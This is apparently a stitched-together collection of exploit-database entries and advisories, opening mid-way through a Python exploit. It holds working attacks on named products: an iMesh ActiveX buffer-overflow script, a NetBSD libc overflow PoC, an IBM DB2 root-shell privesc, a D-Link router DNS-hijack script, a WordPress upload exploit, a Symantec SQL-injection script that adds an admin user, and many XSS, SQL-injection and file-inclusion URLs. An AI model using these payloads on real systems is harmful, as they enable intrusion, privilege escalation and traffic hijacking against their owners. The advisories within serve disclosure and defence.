"\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x52"
"\x00\x45\x00\x41\x00\x4c\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
"\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41"
"\x00\x64\x00\x76\x00\x44\x00\x4f\x00\x55\x00\x42\x00\x4c\x00\x45"
"\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
"\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x53"
"\x00\x74\x00\x72\x00\x69\x00\x6e\x00\x67\x00\x56\x00\x61\x00\x6c"
"\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x0f\x00\x00"
"\x00\x43\x00\x43\x00\x72\x00\x79\x00\x73\x00\x74\x00\x61\x00\x6c"
"\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00\x74\x00\x00\x00\x00"
)
port=5481
s_port=443
def do_ssl(target,port):
try:
conn = httplib.HTTPSConnection(target,port)
conn._http_vsn = 10
conn._http_vsn_str = "HTTP/1.0"
conn.request("GET","/diag/Info")
resp = conn.getresponse()
conn.close()
except Exception, error:
print("Error: %s" % error)
return None
return resp
def main():
if len(sys.argv)!=2:
print("Usage: %s <target>" % sys.argv[0])
sys.exit(0)
target=sys.argv[1]
cs=target,port
print "Checking server status..."
resp = do_ssl(target,s_port)
if(resp == None):
return
if(resp.status==301):
print "Server status is normal.\n"
elif(resp.status==200):
print "Server is already in safe mode."
sys.exit(1)
elif((resp.status!=301)|(resp.status!=200)):
print("Server returned %d %s, server state unknown.\nContinuing anyways..\n" % (resp.status,resp.reason))
print("Sending packets to trigger exception...\n")
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)
sock.send(pkt_1)
resp_1 = sock.recv(32)
sock.send(pkt_2)
resp_2 = sock.recv(32)
sock.send(pkt_3)
resp_3 = sock.recv(32)
sock.close()
except Exception, error:
print("Error: %s" % error)
return None
print("Finished, checking server status again...")
sleep(1)
resp = do_ssl(target,s_port)
if(resp == None):
return
if(resp.status==301):
print("Server status is still normal, maybe it's patched..\n")
elif(resp.status==200):
print("Server entered \"safe\" mode :)\n")
print("Surf on over to https://%s:443/diag/Info to explore" % target)
elif((resp.status!=301)|(resp.status!=200)):
print("Server returned %d %s, server state unknown." % (resp.status,resp.reason))
if __name__ == "__main__":
main()
source: https://www.securityfocus.com/bid/48559/info
Paliz Portal is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Page.aspx?search=1[XSSCode]&mID=1641&Page=search/advancedsearch
http://www.example.com/News/shownews/[page].aspx?NewsId=[Sqli]
http://www.example.com/[Path]/Default.aspx?tabid=[Sqli]
source: https://www.securityfocus.com/bid/48558/info
The 'com_jr_tfb' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/index.php?option=com_jr_tfb&controller=../../../../../../../../etc/passwd%00
source: https://www.securityfocus.com/bid/48550/info
iMesh is prone to a buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied data.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
iMesh 10.0 is vulnerable; other versions may also be affected.
<!--
###
# Title : iMesh <= 10.0 (IMWebControl.dll) Remote Buffer Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Remote Buffer Overflow & DLL Hijacked
##
# <3 Liyan Oz + All UE-Team & I.BackTrack Team <3
###
-->
<?XML version='1.0' standalone='yes' ?>
<package>
<job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B97' id='target'/>
<script language='vbscript'>
'Wscript.echo typename(target)
targetFile = "C:\Program Files\iMesh Applications\iMesh\IMWebControl.dll"
prototype = "ProcessRequestEx ( ByVal sourceName As String , ByVal destName As String , ByVal bFailIfExists As Long )"
memberName = "ProcessRequestEx"
progid = "target.IMWebControl"
buf=String(31337, "A") ' Buffer Overflow
puf=218959117 'set ecx to 0x0d0d0d0d
target.SetHandler puf
target.ProcessRequestEx buf ,puf ' Bo0M !
</script>
</job>
</package>
<!--
#================[ Exploited By KedAns-Dz * Inj3ct0r * ]=========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > ++ Liyan Oz & Blackrootkit ..all
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# Jago-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================
-->
// source: https://www.securityfocus.com/bid/48528/info
NetBSD is prone to a stack-based buffer-overflow vulnerability affecting multiple functions in the 'libc/net' library.
Successful exploits may allow an attacker to execute arbitrary code in the context of the application using the affected library. Failed exploit attempts will result in a denial-of-service condition.
/*
127# gcc -o grr grr.c && ./grr 6050
127# gcc -o grr grr.c && ./grr 6051
Memory fault (core dumped)
127#
*/
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
int main(int argc, char *argv[]){
char *cycek;
cycek=malloc(atoi(argv[1]));
if(!cycek) return 1;
memset(cycek,'A',atoi(argv[1]));
getservbyname(cycek,"tcp");
return 0;
}
// source: https://www.securityfocus.com/bid/48514/info
IBM DB2 is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue to gain elevated privileges and execute arbitrary code with root privileges. Successfully exploiting this issue will result in a complete compromise of the affected system.
IBM DB2 9.7 is vulnerable; other versions may also be affected.
/*
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the Nth Dimension nor the names of its contributors may
be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
(c) Tim Brown, 2011
<mailto:timb@nth-dimension.org.uk>
<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
PoC exploit for IBM DB2 DT_RPATH privesc.
*/
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv) {
FILE *badlibkbbsrchandle;
int pwnedflag;
printf("PoC exploit for IBM DB2 DT_RPATH privesc.\r\n");
printf("(c) Tim Brown, 2011\r\n");
printf("<mailto:timb@nth-dimension.org.uk>\r\n");
printf("<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>\r\n");
printf("Constructing bad_libkbb.so...\r\n");
badlibkbbsrchandle = fopen("bad_libkbb.c", "w");
fprintf(badlibkbbsrchandle, "#include <stdio.h>\r\n");
fprintf(badlibkbbsrchandle, "#include <unistd.h>\r\n");
fprintf(badlibkbbsrchandle, "#include <stdlib.h>\r\n");
fprintf(badlibkbbsrchandle, "\r\n");
fprintf(badlibkbbsrchandle, "void __attribute__ ((constructor)) bad_libkbb(void) {\r\n");
fprintf(badlibkbbsrchandle, " printf(\"Have a root shell...\\r\\n\");\r\n");
fprintf(badlibkbbsrchandle, " setuid(geteuid());\r\n");
fprintf(badlibkbbsrchandle, " system(\"/usr/bin/id\");\r\n");
fprintf(badlibkbbsrchandle, " system(\"/bin/sh\");\r\n");
fprintf(badlibkbbsrchandle, " exit(0);\r\n");
fprintf(badlibkbbsrchandle, "}\r\n");
fclose(badlibkbbsrchandle);
system("gcc -shared -fPIC -o libkbb.so bad_libkbb.c");
system("/opt/ibm/db2/V9.7/itma/tmaitm6/lx8266/bin/kbbacf1");
exit(0);
}
#!/bin/bash
#
# D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
# Description:
# Different D-Link Routers are vulnerable to DNS change.
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES MAY AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
echo " ================================================================"
echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
echo " Example: $0 192.168.1.1 8.8.8.8"
echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
echo " http://www.ethical-hacker.org/"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1
# Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload
# Date: 11-11-2014
# Software Link: https://wordpress.org/plugins/photo-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9312
# Category: webapps
1. Description
Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php
http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register).
Pack .php files into .zip archive then send it using:
<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
<input type="file" name="files">
<input type="submit" value="Hack!">
</form>
Your files will be visible inside:
http://wordpress-install/wp-admin/rce/
3. Solution:
Update to version 1.2.6
https://downloads.wordpress.org/plugin/photo-gallery.1.2.6.zip
SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >
=======================================================================
title: Multiple critical vulnerabilities
products: Symantec Data Center Security: Server Advanced (SDCS:SA)
Symantec Critical System Protection (SCSP)
vulnerable version: see: Vulnerable / tested versions
fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all
vulnerabilities were fixed, but mitigations exist
impact: Critical
CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226
homepage: http://www.symantec.com
found: 2014-09-19
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)
extends the Data Center Security: Server solution beyond agentless threat
protections by incorporating technologies previous known as Critical System
Protection. Data Center Security: Server Advanced provides granular, policy-
based controls with a low impact in-guest agent to monitor and protect numerous
physical and virtual server environments. Through a combination of technologies
including application-centric controls including protected white listing,
sandboxing using least privilege access controls, host-based intrusion detection
(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),
organizations can proactively safeguard their heterogeneous server environments
and the information they contain from zero-day and targeted attacks, and fulfill
their compliance mandates across critical systems. Click here for more info"
Source:
http://www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products
Business recommendation:
------------------------
Attackers are able to completely compromise the SDCS:SA Server as they can gain
access at the system and database level. Furthermore attackers can manage all
clients and their policies.
SDCS:SA Server can be used as an entry point into the target infrastructure
(lateral movement, privilege escalation).
Furthermore the SDCS:SA Client protections can be bypassed in several ways.
It is highly recommended by SEC Consult not to use this software until a
thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been
performed by security professionals and all identified issues have been
resolved.
Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
Due to insufficient input validation, the application allows the injection
of direct SQL commands. By exploiting the vulnerability, an attacker gains
access (read/write) to all records stored in the database as arbitrary SQL
statements can be executed.
Furthermore the application design enables an attacker to gain code execution
as SYSTEM (highest privilege Windows user) on the server by exploiting this
vulnerability.
No prior authentication is needed to exploit this vulnerability.
Affected script:
https://<host>:4443/sis-ui/authenticate
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
The applications suffers from a reflected cross-site scripting vulnerability,
which allows an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the admin interface.
Affected scripts:
https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp
https://<host>:8081/webui/admin/WCUnsupportedClass.jsp
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
A script discloses internal information about the application on the server
without prior authentication. This information includes file paths on the
webserver, version information (OS, Java) and is accessible without prior
authentication.
Affected script:
https://<host>:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
Several bypasses were discovered. These require Windows Administrator
permissions. This requirement is usually met in SDCS:SA deployments.
Note: SEC Consult did not check whether the mitigations provided by Symantec do
in fact sufficiently mitigate these vulnerabilities!
- Persistent code execution via Windows Services
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution.
- Remote code execution via RPC
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution. In addition to that "psexec-style" remote code
execution via SMB is possible as well.
- Policy bypass: Extraction of Windows passwords/hashes
The default Symantec policy rules do not prevent attackers from extracting
the Windows passwords/password hashes from the System.
- Privilege elevation via Windows Installer (msiexec.exe)
The restrictions imposed by the default policies can be bypassed entirely by
exploiting incorrect assumptions made in the policy regarding the Windows
Installer (msiexec.exe).
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
The restrictions imposed by default policies can be bypassed partially by
exploiting incorrect assumptions made in the policy regarding the Windows
Management Instrumentation. The policy does not take intended OS functionality
to execute code into account.
Proof of concept:
-----------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is
vulnerable to SQL injection. By sending a specially crafted HTTP request,
arbitrary SQL statements can be executed.
In a proof of concept exploit, SQL statements to add a new SDCS:SA user with
admin privileges (username: secconsult, password: PASSWORD123!) were executed.
These statements are:
INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL,
ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME,
MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult',
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=',
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09',
'2014-09-12 07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);
The code used to exploit the SQL injection vulnerability is listed below:
import httplib
def send_request(host,data):
params = data
headers = {"AppFire-Format-Version": "1.0",
"AppFire-Charset": "UTF-16LE",
"Content-Type":"application/x-appfire",
"User-Agent":"Java/1.7.0_45",
}
conn = httplib.HTTPSConnection(host)
conn.request("POST", "/sis-ui/authenticate", params, headers)
response = conn.getresponse()
data=response.read()
conn.close()
return response,data
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
-- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server
6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')
eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag
response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status
As the application users act as Tomcat administrators, an attacker can login
into the Tomcat manager as well. The Tomcat manager is available by default
via TCP port 8081 HTTPS.
The Tomcat Web Application Manager can be used to deploy new .war-files
containing attacker-controlled Java code. This allows an attacker to execute
arbitrary commands on the operating system with the permissions/user of the
"Symantec Data Center Security Server Manager" service (SISManager) which are
SYSTEM.
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
At least the following URLs are vulnerable to XSS:
https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>
https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
The following URLs discloses internal information:
https://example.com:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
- Persistent code execution via Windows Services
Windows Service binaries can have file extensions other than ".exe". This
allows an attacker to execute arbitrary files and enables automatic execution
of malicious code at OS boot.
- Remote code execution via RPC
Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can
be modified to write files not ending with ".exe" on the target system.
- Policy bypass: Extraction of Windows passwords/hashes
The tool "mimikatz" can be used to extract Windows credentials.
- Privilege elevation via Windows Installer (msiexec.exe)
msiexec.exe is trusted "safe privileges" when started as a service (usually
"Windows Installer" parameter "/V"). This can be abused by creating a service
that starts msiexec.exe with the parameters "/quiet", "/i" and a path to a valid
.msi file. Upon service start the .msi file is executed with "safe privileges"
privileges and not subject to any SDCS:SA Client checks.
sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i
c:\temp\evil_msi" type= own start= auto error= ignore
net start evil_service
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\"
are automatically compiled/executed. These trigger arbitrary code execution.
The code is executed with "def_winsvcs_ps" permissions.
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Symantec Data Center
Security: Server Advanced version 6.0, which was the most recent version at
the time of discovery.
However other versions (SCSP 5.2.9) are affected by the vulnerabilities as
well. See the vendor information in the Solution section.
Vendor contact timeline:
------------------------
2014-10-20: Sending advisory and proof of concept exploit via encrypted
channel.
2014-10-20: Vendor acknowledges receipt of advisory.
2014-11-18: Requesting status update.
2014-11-18: Vendor responds and informs about an advisory in December,
version containing fixes in February.
2014-12-04: Vendor informs about delays in releasing fixes/mitigations,
target release date mid-January.
2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).
2015-01-17: Vendor releases fixes for SCSP.
2015-01-19: Vendor releases advisory and mitigations for SCSP/
2015-01-22: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).
Not all vulnerabilities are fixed by this update! However, Symantec has
provided mitigations for these issues:
More information can be found at:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00
http://www.symantec.com/business/support/index?page=content&id=TECH227679
http://www.symantec.com/business/support/index?page=content&id=HOWTO100996&actp=search&viewlocale=en_US&searchid=1421349750071
Workaround:
-----------
See solution.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF Stefan Viehböck / @2015
Advisory:
Advisory ID: SROEADV-2015-10
Author: Steffen Rösemann
Affected Software: ferretCMS v. 1.0.4-alpha
Vendor URL: https://github.com/JRogaishio/ferretCMS
Vendor Status: vendor will patch eventually
CVE-ID: -
Tested on:
- Firefox 35, Iceweasel 31
- Mac OS X 10.10, Kali Linux 1.0.9a
==========================
Vulnerability Description:
==========================
The content management system ferretCMS v.1.0.4, which is currently in
alpha development stage, suffers from multiple stored/reflecting XSS- and
SQLi-vulnerabilities in its administrative backend.
Moreover, there exists the possibility to upload arbitrary files via the
administrative backend, which can be executed by unauthenticated users, too.
==================
Technical Details:
==================
A reflecting XSS vulnerability can be found in the parameter "action" used
in the file admin.php:
http://
{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Stored XSS vulnerabilities resides in the logging functionality of
ferretCMS. On the administrative backend, the administrator has the
opportunity to watch events stored in a log. An event, that gets logged,
are login-attempts to the administrative backend, where the used username
is displayed, too. An attacker can abuse this, by trying to log in with
JavaScript-code instead of a username. That code gets executed in the logs.
Login-form is located here: http://{TARGET}/admin.php
XSS gets executed here: http://{TARGET}/admin.php?type=log&action=read
Another stored XSS vulnerability can be found in the pagetitle of a new
blog entry that is created by the administrator:
vulnerable form: http://{TARGET}/admin.php?type=page&action=insert&p=
XSS gets executed here: http://{TARGET}/admin.php?type=page&action=read
The following URLs are prone to SQL injection attacks:
http://
{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://
{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+
http://
{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+
http://
{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+
http://
{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+
http://
{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://
{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+
Last but not least there is a file-upload functionality in the
administrative backend of ferretCMS. The administrator can upload arbitrary
files here via the following URL:
http://localhost/ferretCMS/admin.php?type=uploader&action=upload
Any unauthenticated user can execute/read those files that had been
uploaded by visiting the following URL:
http://{TARGET}/custom/uploads/{NAME_OF_THE_UPLOADED_FILE}
=========
Solution:
=========
Vendor responded, issues will be patched eventually.
====================
Disclosure Timeline:
====================
15/16-Jan-2015 – found the vulnerability
16-Jan-2015 - informed the developers (see [3])
16-Jan-2015 – release date of this security advisory [without technical
details]
21-Jan-2015 - attempt #2 to inform the developer via mail
22-Jan-2015 - vendor responded, technical details posted to Github (see [3])
22-Jan-2015 - release date of this security advisory
22-Jan-2015 - send to lists
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] https://github.com/JRogaishio/ferretCMS
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
[3] https://github.com/JRogaishio/ferretCMS/issues/63
[4] https://github.com/sroesemann/ferretCMS